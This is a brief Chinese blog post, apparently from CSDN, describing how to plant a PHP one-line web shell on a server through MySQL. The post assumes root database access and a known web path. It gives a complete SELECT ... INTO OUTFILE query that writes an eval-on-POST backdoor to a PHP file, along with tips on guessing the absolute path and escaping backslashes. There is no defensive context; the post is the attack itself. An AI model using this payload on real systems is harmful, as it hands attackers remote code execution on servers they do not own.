版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/weixin_39997829/article/details/81069027
前提:
root权限,知道了服务器的web的绝对路径,尝试写入一句话
mysql查询语句执行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php"
注意事项:
1、绝对路径的猜解
2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.php”(对反斜杠做了一次转义)